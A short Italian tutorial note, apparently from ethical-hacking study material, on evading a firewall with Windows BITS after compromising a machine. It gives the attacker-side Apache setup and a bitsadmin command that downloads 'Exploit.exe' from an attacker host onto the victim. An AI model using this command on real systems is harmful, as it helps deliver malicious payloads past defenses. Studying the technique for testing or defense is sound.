tags: Evasione_Sistemi_di_Difesa Bitsadmin Evasione_Sistemi_di_Difesa_Windows


Evasione Firewall tramite BITS

Quando siamo riusciti ad ottenere accesso alla macchina e vogliamo trasferire un file malevolo nella macchina vittima, ma un firewall ci impedisce di trasferirlo con i metodi standard possiamo utilizzare la componente BITS presente in Windows che permette di trasferire file con qualche riga di comando da e verso web server senza essere controllato dai vari sistemi di difesa proprio perchè viene considerato un traffico legittimo, ovviamente quello che possiamo copiare e dove lo possiamo copiare dipenderà dai privilegi che abbiamo ottenuto nella compromissione della macchina, per fare questa operazione eseguiamo i seguenti passaggi:

Creazione server per trasferire il file

Apache

  • Digita mkdir /var/www/html/share e premi Invio per creare una cartella condivisa

  • Digita chmod -R 755 /var/www/html/share e premi Invio

  • Digita chown -R www-data:www-data /var/www/html/share e premi Invio

  • Copia il file malevolo nella posizione condivisa digitando cp Exploit.exe /var/www/html/share e premendo Invio

  • Lancia il comando service apache2 start

Trasferimento file

  • Apri powershell sulla macchina vittima

  • Inserisci questo comando bitsadmin /transfer Exploit.exe http://10.10.1.13/share/Exploit.exe c:\Exploit.exe

Questo metodo ti permette solo di trasferire file senza essere disturbato dai sistemi di difesa, ma non appena esegui il file tutti i sistemi di difesa tornano a funzionare, quindi questo exploit per esempio verrebbe individuato subito!